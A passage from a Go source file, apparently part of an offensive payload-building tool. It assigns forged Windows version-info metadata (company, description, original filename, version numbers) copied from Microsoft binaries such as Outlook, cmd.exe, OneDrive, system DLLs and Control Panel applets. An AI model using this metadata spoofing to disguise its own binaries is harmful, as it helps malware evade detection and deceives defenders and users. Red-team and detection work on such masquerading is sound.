395 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
396 | vi.StringFileInfo.InternalName = "Outlook.exe"
397 | vi.StringFileInfo.FileDescription = "Microsoft Outlook"
398 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
399 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
400 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
401 | vi.FixedFileInfo.ProductVersion.Patch = 11929
402 | vi.FixedFileInfo.ProductVersion.Major = 16
403 | vi.FixedFileInfo.ProductVersion.Minor = 0
404 | vi.StringFileInfo.ProductName = "Microsoft Office"
405 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
406 | vi.FixedFileInfo.FileVersion.Major = 16
407 | vi.FixedFileInfo.FileVersion.Minor = 0
408 | vi.FixedFileInfo.FileVersion.Patch = 11929
409 | vi.FixedFileInfo.FileVersion.Build = 20838
410 | vi.StringFileInfo.InternalName = "Outlook"
411 | }
412 | if name == "lync" {
413 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
414 | vi.StringFileInfo.InternalName = "Lync"
415 | vi.StringFileInfo.FileDescription = "Skype for Business"
416 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
417 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
418 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe"
419 | vi.FixedFileInfo.ProductVersion.Patch = 11929
420 | vi.FixedFileInfo.ProductVersion.Major = 16
421 | vi.FixedFileInfo.ProductVersion.Minor = 0
422 | vi.StringFileInfo.ProductName = "Microsoft Office"
423 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
424 | vi.FixedFileInfo.FileVersion.Major = 16
425 | vi.FixedFileInfo.FileVersion.Minor = 0
426 | vi.FixedFileInfo.FileVersion.Patch = 11929
427 | vi.FixedFileInfo.FileVersion.Build = 20838
428 | vi.StringFileInfo.InternalName = "Lync"
429 | }
430 | if name == "cmd" {
431 | vi.StringFileInfo.InternalName = "cmd"
432 | vi.StringFileInfo.FileDescription = "Windows Command Processor"
433 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
434 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
435 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe"
436 | vi.FixedFileInfo.ProductVersion.Patch = 1
437 | vi.FixedFileInfo.ProductVersion.Major = 10
438 | vi.FixedFileInfo.ProductVersion.Minor = 0
439 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
440 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
441 | vi.FixedFileInfo.FileVersion.Major = 10
442 | vi.FixedFileInfo.FileVersion.Minor = 0
443 | vi.FixedFileInfo.FileVersion.Patch = 1
444 | vi.FixedFileInfo.FileVersion.Build = 18362
445 | vi.StringFileInfo.InternalName = "cmd.exe"
446 | }
447 | if name == "OneDrive" {
448 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
449 | vi.StringFileInfo.InternalName = "OneDrive.exe"
450 | vi.StringFileInfo.FileDescription = "Microsoft OneDrive"
451 | vi.StringFileInfo.FileVersion = "20.114.0607.0002"
452 | vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved."
453 | vi.StringFileInfo.OriginalFilename = "OneDrive.exe"
454 | vi.FixedFileInfo.ProductVersion.Patch = 2
455 | vi.FixedFileInfo.ProductVersion.Major = 20
456 | vi.FixedFileInfo.ProductVersion.Minor = 114
457 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
458 | vi.StringFileInfo.ProductVersion = "20.114.0607.0002"
459 | vi.FixedFileInfo.FileVersion.Major = 20
460 | vi.FixedFileInfo.FileVersion.Minor = 114
461 | vi.FixedFileInfo.FileVersion.Patch = 2
462 | vi.FixedFileInfo.FileVersion.Build = 607
463 | vi.StringFileInfo.InternalName = "OneDrive.exe"
464 | }
465 | if name == "apphelp" {
466 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
467 | vi.StringFileInfo.InternalName = "Apphelp"
468 | vi.StringFileInfo.FileDescription = "Application Compatibility Client Library"
469 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
470 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
471 | vi.StringFileInfo.LegalTrademarks = ""
472 | vi.FixedFileInfo.ProductVersion.Patch = 18362
473 | vi.FixedFileInfo.ProductVersion.Major = 10
474 | vi.FixedFileInfo.ProductVersion.Minor = 0
475 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
476 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
477 | vi.FixedFileInfo.FileVersion.Major = 10
478 | vi.FixedFileInfo.FileVersion.Minor = 0
479 | vi.FixedFileInfo.FileVersion.Patch = 18362
480 | vi.FixedFileInfo.FileVersion.Build = 1
481 | vi.StringFileInfo.OriginalFilename = "Apphelp.dll"
482 | }
483 | if name == "bcryptprimitives" {
484 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
485 | vi.StringFileInfo.InternalName = "bcryptprimitives.dll"
486 | vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library"
487 | vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)"
488 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
489 | vi.StringFileInfo.LegalTrademarks = ""
490 | vi.FixedFileInfo.ProductVersion.Patch = 18362
491 | vi.FixedFileInfo.ProductVersion.Major = 10
492 | vi.FixedFileInfo.ProductVersion.Minor = 0
493 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
494 | vi.StringFileInfo.ProductVersion = "10.0.18362.836"
495 | vi.FixedFileInfo.FileVersion.Major = 10
496 | vi.FixedFileInfo.FileVersion.Minor = 0
497 | vi.FixedFileInfo.FileVersion.Patch = 18362
498 | vi.FixedFileInfo.FileVersion.Build = 836
499 | vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll"
500 | }
501 | if name == "cfgmgr32" {
502 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
503 | vi.StringFileInfo.InternalName = "cfgmgr32.dll"
504 | vi.StringFileInfo.FileDescription = "Configuration Manager DLL"
505 | vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)"
506 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
507 | vi.StringFileInfo.LegalTrademarks = ""
508 | vi.FixedFileInfo.ProductVersion.Patch = 18362
509 | vi.FixedFileInfo.ProductVersion.Major = 10
510 | vi.FixedFileInfo.ProductVersion.Minor = 0
511 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
512 | vi.StringFileInfo.ProductVersion = "10.0.18362.387"
513 | vi.FixedFileInfo.FileVersion.Major = 10
514 | vi.FixedFileInfo.FileVersion.Minor = 0
515 | vi.FixedFileInfo.FileVersion.Patch = 18362
516 | vi.FixedFileInfo.FileVersion.Build = 387
517 | vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll"
518 | }
519 | if name == "combase" {
520 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
521 | vi.StringFileInfo.InternalName = "COMBASE.DLL"
522 | vi.StringFileInfo.FileDescription = "Microsoft COM for Windows"
523 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
524 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
525 | vi.StringFileInfo.LegalTrademarks = ""
526 | vi.FixedFileInfo.ProductVersion.Patch = 18362
527 | vi.FixedFileInfo.ProductVersion.Major = 10
528 | vi.FixedFileInfo.ProductVersion.Minor = 0
529 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
530 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
531 | vi.FixedFileInfo.FileVersion.Major = 10
532 | vi.FixedFileInfo.FileVersion.Minor = 0
533 | vi.FixedFileInfo.FileVersion.Patch = 18362
534 | vi.FixedFileInfo.FileVersion.Build = 1
535 | vi.StringFileInfo.OriginalFilename = "COMBASE.DLL"
536 | }
537 | if name == "cryptsp" {
538 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
539 | vi.StringFileInfo.InternalName = "cryptsp.dll"
540 | vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API"
541 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
542 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
543 | vi.StringFileInfo.LegalTrademarks = ""
544 | vi.FixedFileInfo.ProductVersion.Patch = 18362
545 | vi.FixedFileInfo.ProductVersion.Major = 10
546 | vi.FixedFileInfo.ProductVersion.Minor = 0
547 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
548 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
549 | vi.FixedFileInfo.FileVersion.Major = 10
550 | vi.FixedFileInfo.FileVersion.Minor = 0
551 | vi.FixedFileInfo.FileVersion.Patch = 18362
552 | vi.FixedFileInfo.FileVersion.Build = 1
553 | vi.StringFileInfo.OriginalFilename = "cryptsp.dll"
554 | }
555 | if name == "dnsapi" {
556 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
557 | vi.StringFileInfo.InternalName = "dnsapi"
558 | vi.StringFileInfo.FileDescription = "DNS Client API DLL"
559 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
560 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
561 | vi.StringFileInfo.LegalTrademarks = ""
562 | vi.FixedFileInfo.ProductVersion.Patch = 18362
563 | vi.FixedFileInfo.ProductVersion.Major = 10
564 | vi.FixedFileInfo.ProductVersion.Minor = 0
565 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
566 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
567 | vi.FixedFileInfo.FileVersion.Major = 10
568 | vi.FixedFileInfo.FileVersion.Minor = 0
569 | vi.FixedFileInfo.FileVersion.Patch = 18362
570 | vi.FixedFileInfo.FileVersion.Build = 1
571 | vi.StringFileInfo.OriginalFilename = "dnsapi"
572 | }
573 | if name == "dpapi" {
574 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
575 | vi.StringFileInfo.InternalName = "dpapi.dll"
576 | vi.StringFileInfo.FileDescription = "Data Protection API"
577 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
578 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
579 | vi.StringFileInfo.LegalTrademarks = ""
580 | vi.FixedFileInfo.ProductVersion.Patch = 18362
581 | vi.FixedFileInfo.ProductVersion.Major = 10
582 | vi.FixedFileInfo.ProductVersion.Minor = 0
583 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
584 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
585 | vi.FixedFileInfo.FileVersion.Major = 10
586 | vi.FixedFileInfo.FileVersion.Minor = 0
587 | vi.FixedFileInfo.FileVersion.Patch = 18362
588 | vi.FixedFileInfo.FileVersion.Build = 1
589 | vi.StringFileInfo.OriginalFilename = "dpapi.dll"
590 | }
591 | if name == "sechost" {
592 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
593 | vi.StringFileInfo.InternalName = "sechost.dll"
594 | vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs"
595 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
596 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
597 | vi.StringFileInfo.LegalTrademarks = ""
598 | vi.FixedFileInfo.ProductVersion.Patch = 18362
599 | vi.FixedFileInfo.ProductVersion.Major = 10
600 | vi.FixedFileInfo.ProductVersion.Minor = 0
601 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
602 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
603 | vi.FixedFileInfo.FileVersion.Major = 10
604 | vi.FixedFileInfo.FileVersion.Minor = 0
605 | vi.FixedFileInfo.FileVersion.Patch = 18362
606 | vi.FixedFileInfo.FileVersion.Build = 1
607 | vi.StringFileInfo.OriginalFilename = "sechost.dll"
608 | }
609 | if name == "schannel" {
610 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
611 | vi.StringFileInfo.InternalName = "schannel.dll"
612 | vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider"
613 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
614 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
615 | vi.StringFileInfo.LegalTrademarks = ""
616 | vi.FixedFileInfo.ProductVersion.Patch = 18362
617 | vi.FixedFileInfo.ProductVersion.Major = 10
618 | vi.FixedFileInfo.ProductVersion.Minor = 0
619 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
620 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
621 | vi.FixedFileInfo.FileVersion.Major = 10
622 | vi.FixedFileInfo.FileVersion.Minor = 0
623 | vi.FixedFileInfo.FileVersion.Patch = 18362
624 | vi.FixedFileInfo.FileVersion.Build = 1
625 | vi.StringFileInfo.OriginalFilename = "schannel.dll"
626 | }
627 | if name == "urlmon" {
628 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
629 | vi.StringFileInfo.InternalName = "UrlMon.dll"
630 | vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32"
631 | vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)"
632 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
633 | vi.StringFileInfo.LegalTrademarks = ""
634 | vi.FixedFileInfo.ProductVersion.Patch = 18362
635 | vi.FixedFileInfo.ProductVersion.Major = 11
636 | vi.FixedFileInfo.ProductVersion.Minor = 0
637 | vi.StringFileInfo.ProductName = "Internet Explorer"
638 | vi.StringFileInfo.ProductVersion = "11.00.18362.1"
639 | vi.FixedFileInfo.FileVersion.Major = 10
640 | vi.FixedFileInfo.FileVersion.Minor = 0
641 | vi.FixedFileInfo.FileVersion.Patch = 18362
642 | vi.FixedFileInfo.FileVersion.Build = 1
643 | vi.StringFileInfo.OriginalFilename = "UrlMon.dll"
644 | }
645 | if name == "win32u" {
646 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
647 | vi.StringFileInfo.InternalName = "Win32u"
648 | vi.StringFileInfo.FileDescription = "Win32u"
649 | vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)"
650 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
651 | vi.StringFileInfo.LegalTrademarks = ""
652 | vi.FixedFileInfo.ProductVersion.Patch = 18362
653 | vi.FixedFileInfo.ProductVersion.Major = 10
654 | vi.FixedFileInfo.ProductVersion.Minor = 0
655 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
656 | vi.StringFileInfo.ProductVersion = "10.0.18362.900"
657 | vi.FixedFileInfo.FileVersion.Major = 10
658 | vi.FixedFileInfo.FileVersion.Minor = 0
659 | vi.FixedFileInfo.FileVersion.Patch = 18362
660 | vi.FixedFileInfo.FileVersion.Build = 1
661 | vi.StringFileInfo.OriginalFilename = "Win32u"
662 | }
663 | if name == "appwizard" {
664 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
665 | vi.StringFileInfo.InternalName = "appwiz.cpl"
666 | vi.StringFileInfo.FileDescription = "Shell Application Manager"
667 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
668 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
669 | vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI"
670 | vi.FixedFileInfo.ProductVersion.Patch = 18362
671 | vi.FixedFileInfo.ProductVersion.Major = 10
672 | vi.FixedFileInfo.ProductVersion.Minor = 0
673 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
674 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
675 | vi.FixedFileInfo.FileVersion.Major = 10
676 | vi.FixedFileInfo.FileVersion.Minor = 0
677 | vi.FixedFileInfo.FileVersion.Patch = 18362
678 | vi.FixedFileInfo.FileVersion.Build = 1
679 | vi.StringFileInfo.InternalName = "appwiz.cpl"
680 | }
681 | if name == "bthprop" {
682 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
683 | vi.StringFileInfo.InternalName = "bthprops.cpl"
684 | vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet"
685 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
686 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
687 | vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui"
688 | vi.FixedFileInfo.ProductVersion.Patch = 18362
689 | vi.FixedFileInfo.ProductVersion.Major = 10
690 | vi.FixedFileInfo.ProductVersion.Minor = 0
691 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
692 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
693 | vi.FixedFileInfo.FileVersion.Major = 10
694 | vi.FixedFileInfo.FileVersion.Minor = 0
695 | vi.FixedFileInfo.FileVersion.Patch = 18362
696 | vi.FixedFileInfo.FileVersion.Build = 1
697 | vi.StringFileInfo.InternalName = "bthprops.cpl"
698 | }
699 | if name == "desktop" {
700 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
701 | vi.StringFileInfo.InternalName = "desk.cpl"
702 | vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel"
703 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
704 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
705 | vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI"
706 | vi.FixedFileInfo.ProductVersion.Patch = 18362
707 | vi.FixedFileInfo.ProductVersion.Major = 10
708 | vi.FixedFileInfo.ProductVersion.Minor = 0
709 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
710 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
711 | vi.FixedFileInfo.FileVersion.Major = 10
712 | vi.FixedFileInfo.FileVersion.Minor = 0
713 | vi.FixedFileInfo.FileVersion.Patch = 18362
714 | vi.FixedFileInfo.FileVersion.Build = 1
715 | vi.StringFileInfo.InternalName = "DESK"
716 |
717 | }
718 | if name == "netfirewall" {
719 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
720 | vi.StringFileInfo.InternalName = "Firewall.cpl"
721 | vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub"
722 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
723 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
724 | vi.StringFileInfo.OriginalFilename = "Firewall.cpl"
725 | vi.FixedFileInfo.ProductVersion.Patch = 18362
726 | vi.FixedFileInfo.ProductVersion.Major = 10
727 | vi.FixedFileInfo.ProductVersion.Minor = 0
728 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
729 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
730 | vi.FixedFileInfo.FileVersion.Major = 10
731 | vi.FixedFileInfo.FileVersion.Minor = 0
732 | vi.FixedFileInfo.FileVersion.Patch = 18362
733 | vi.FixedFileInfo.FileVersion.Build = 1
734 | vi.StringFileInfo.InternalName = "Firewall.cpl"
735 | }
736 | if name == "FlashPlayer" {
737 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
738 | vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0"
739 | vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet"
740 | vi.StringFileInfo.FileVersion = "32.0.0.255"
741 | vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries."
742 | vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl"
743 | vi.FixedFileInfo.ProductVersion.Patch = 0
744 | vi.FixedFileInfo.ProductVersion.Major = 32
745 | vi.FixedFileInfo.ProductVersion.Minor = 0
746 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
747 | vi.StringFileInfo.ProductVersion = "32.0.0.255"
748 | vi.FixedFileInfo.FileVersion.Major = 32
749 | vi.FixedFileInfo.FileVersion.Minor = 0
750 | vi.FixedFileInfo.FileVersion.Patch = 0
751 | vi.FixedFileInfo.FileVersion.Build = 255
752 | vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl"
753 | }
754 | if name == "hardwarewiz" {
755 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
756 | vi.StringFileInfo.InternalName = "hdwwiz.cpl"
757 | vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet"
758 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
759 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
760 | vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui"
761 | vi.FixedFileInfo.ProductVersion.Patch = 18362
762 | vi.FixedFileInfo.ProductVersion.Major = 10
763 | vi.FixedFileInfo.ProductVersion.Minor = 0
764 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
765 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
766 | vi.FixedFileInfo.FileVersion.Major = 10
767 | vi.FixedFileInfo.FileVersion.Minor = 0
768 | vi.FixedFileInfo.FileVersion.Patch = 18362
769 | vi.FixedFileInfo.FileVersion.Build = 1
770 | vi.StringFileInfo.InternalName = "hdwwiz"
771 | }
772 | if name == "inet" {
773 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
774 | vi.StringFileInfo.InternalName = "inetcpl.cpl"
775 | vi.StringFileInfo.FileDescription = "Internet Control Panel"
776 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
777 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
778 | vi.StringFileInfo.OriginalFilename = ""
779 | vi.FixedFileInfo.ProductVersion.Patch = 18362
780 | vi.FixedFileInfo.ProductVersion.Major = 10
781 | vi.FixedFileInfo.ProductVersion.Minor = 0
782 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
783 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
784 | vi.FixedFileInfo.FileVersion.Major = 10
785 | vi.FixedFileInfo.FileVersion.Minor = 0
786 | vi.FixedFileInfo.FileVersion.Patch = 18362
787 | vi.FixedFileInfo.FileVersion.Build = 1
788 | vi.StringFileInfo.InternalName = "inetcpl.cpl"
789 | }
790 | if name == "control" {
791 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
792 | vi.StringFileInfo.InternalName = "intl.cpl"
793 | vi.StringFileInfo.FileDescription = "Control Panel DLL"
794 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
795 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
796 | vi.StringFileInfo.OriginalFilename = ""
797 | vi.FixedFileInfo.ProductVersion.Patch = 18362
798 | vi.FixedFileInfo.ProductVersion.Major = 10
799 | vi.FixedFileInfo.ProductVersion.Minor = 0
800 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
801 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
802 | vi.FixedFileInfo.FileVersion.Major = 10
803 | vi.FixedFileInfo.FileVersion.Minor = 0
804 | vi.FixedFileInfo.FileVersion.Patch = 18362
805 | vi.FixedFileInfo.FileVersion.Build = 1
806 | vi.StringFileInfo.InternalName = "CONTROL"
807 | }
808 | if name == "irprop" {
809 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
810 | vi.StringFileInfo.InternalName = "irprops.cpl"
811 | vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet"
812 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
813 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
814 | vi.StringFileInfo.OriginalFilename = "irprops.cpl"
815 | vi.FixedFileInfo.ProductVersion.Patch = 18362
816 | vi.FixedFileInfo.ProductVersion.Major = 10
817 | vi.FixedFileInfo.ProductVersion.Minor = 0
818 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
819 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
820 | vi.FixedFileInfo.FileVersion.Major = 10
821 | vi.FixedFileInfo.FileVersion.Minor = 0
822 | vi.FixedFileInfo.FileVersion.Patch = 18362
823 | vi.FixedFileInfo.FileVersion.Build = 1
824 | vi.StringFileInfo.InternalName = "Infrared Properties"
825 | }
826 | if name == "Game" {
827 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
828 | vi.StringFileInfo.InternalName = "joy.cpl"
829 | vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet"
830 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
831 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
832 | vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI"
833 | vi.FixedFileInfo.ProductVersion.Patch = 18362
834 | vi.FixedFileInfo.ProductVersion.Major = 10
835 | vi.FixedFileInfo.ProductVersion.Minor = 0
836 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
837 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
838 | vi.FixedFileInfo.FileVersion.Major = 10
839 | vi.FixedFileInfo.FileVersion.Minor = 0
840 | vi.FixedFileInfo.FileVersion.Patch = 18362
841 | vi.FixedFileInfo.FileVersion.Build = 1
842 | vi.StringFileInfo.InternalName = "JOY.CPL"
843 | }
844 | if name == "inputs" {
845 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
846 | vi.StringFileInfo.InternalName = "main.cpl"
847 | vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets"
848 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
849 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
850 | vi.StringFileInfo.OriginalFilename = "main.cpl.mui"
851 | vi.FixedFileInfo.ProductVersion.Patch = 18362
852 | vi.FixedFileInfo.ProductVersion.Major = 10
853 | vi.FixedFileInfo.ProductVersion.Minor = 0
854 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
855 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
856 | vi.FixedFileInfo.FileVersion.Major = 10
857 | vi.FixedFileInfo.FileVersion.Minor = 0
858 | vi.FixedFileInfo.FileVersion.Patch = 18362
859 | vi.FixedFileInfo.FileVersion.Build = 1
860 | vi.StringFileInfo.InternalName = "main.cpl"
861 |
862 | }
863 | if name == "mimosys" {
864 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
865 | vi.StringFileInfo.InternalName = "mmsys.dll"
866 | vi.StringFileInfo.FileDescription = "Audio Control Panel"
867 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
868 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
869 | vi.StringFileInfo.OriginalFilename = "MMSys.cpl.mui"
870 | vi.FixedFileInfo.ProductVersion.Patch = 18362
871 | vi.FixedFileInfo.ProductVersion.Major = 10
872 | vi.FixedFileInfo.ProductVersion.Minor = 0
873 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
874 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
875 | vi.FixedFileInfo.FileVersion.Major = 10
876 | vi.FixedFileInfo.FileVersion.Minor = 0
877 | vi.FixedFileInfo.FileVersion.Patch = 18362
878 | vi.FixedFileInfo.FileVersion.Build = 1
879 | vi.StringFileInfo.InternalName = "mmsys.cpl"
880 | }
881 | if name == "ncp" {
882 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
883 | vi.StringFileInfo.InternalName = "ncpa.cpl"
884 | vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub"
885 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
886 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
887 | vi.StringFileInfo.OriginalFilename = "ncpa.cpl.mui"
888 | vi.FixedFileInfo.ProductVersion.Patch = 18362
889 | vi.FixedFileInfo.ProductVersion.Major = 10
890 | vi.FixedFileInfo.ProductVersion.Minor = 0
891 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
892 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
893 | vi.FixedFileInfo.FileVersion.Major = 10
894 | vi.FixedFileInfo.FileVersion.Minor = 0
895 | vi.FixedFileInfo.FileVersion.Patch = 18362
896 | vi.FixedFileInfo.FileVersion.Build = 1
897 | vi.StringFileInfo.InternalName = "ncpa.cpl"
898 | }
899 | if name == "power" {
900 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
901 | vi.StringFileInfo.InternalName = "powercfg.cpl"
902 | vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet"
903 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
